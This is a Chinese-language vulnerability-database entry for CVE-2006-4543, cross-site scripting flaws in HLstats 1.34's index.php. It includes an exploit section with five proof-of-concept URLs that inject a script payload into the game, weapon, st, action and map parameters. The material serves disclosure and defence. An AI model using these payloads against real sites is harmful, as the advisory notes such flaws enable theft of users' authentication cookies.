HLstats 'Index.PHP' 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110921 漏洞类型 跨站脚本
发布时间 2006-08-30 更新时间 2006-09-06
CVE编号 CVE-2006-4543 CNNVD-ID CNNVD-200609-028
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/28446
https://cxsecurity.com/issue/WLB-2006090018
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-028
|漏洞详情
HLStats1.34的index.php中的跨站脚本攻击(XSS)漏洞,远程攻击者可以通过以下方式注入任意Web脚本或HTML:(1)玩家模式中的game参数,(2)武器信息模式中的weapon参数,(3)搜索模式中的st参数,(4)操作信息模式中的action参数,以及(5)映射信息模式中的map参数。
|漏洞EXP
source: http://www.securityfocus.com/bid/19771/info

HLstats is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

Exploiting these issues may help an attacker steal cookie-based authentication credentials and launch other attacks.

Version 1.34 is reported vulnerable; other versions may also be affected.

http://www.example.com/index.php?mode=players&game=%3Cscript%3Ealert(123)%3C/script%3E 
http://www.example.com/index.php?mode=weaponinfo&weapon=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc http://www.example.com/index.php?mode=search&q=whatever&st=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc http://www.example.com/index.php?mode=actioninfo&action=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc http://www.example.com/index.php?mode=mapinfo&map=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc (instead of 'tfc' you should use the game, HLstats is configurated for)
|参考资料

来源:BID
名称:19771
链接:http://www.securityfocus.com/bid/19771
来源:BUGTRAQ
名称:20060830XSSinHLstats1.34
链接:http://www.securityfocus.com/archive/1/archive/1/444716/100/0/threaded
来源:SECUNIA
名称:21635
链接:http://secunia.com/advisories/21635
来源:SREASON
名称:1490
链接:http://securityreason.com/securityalert/1490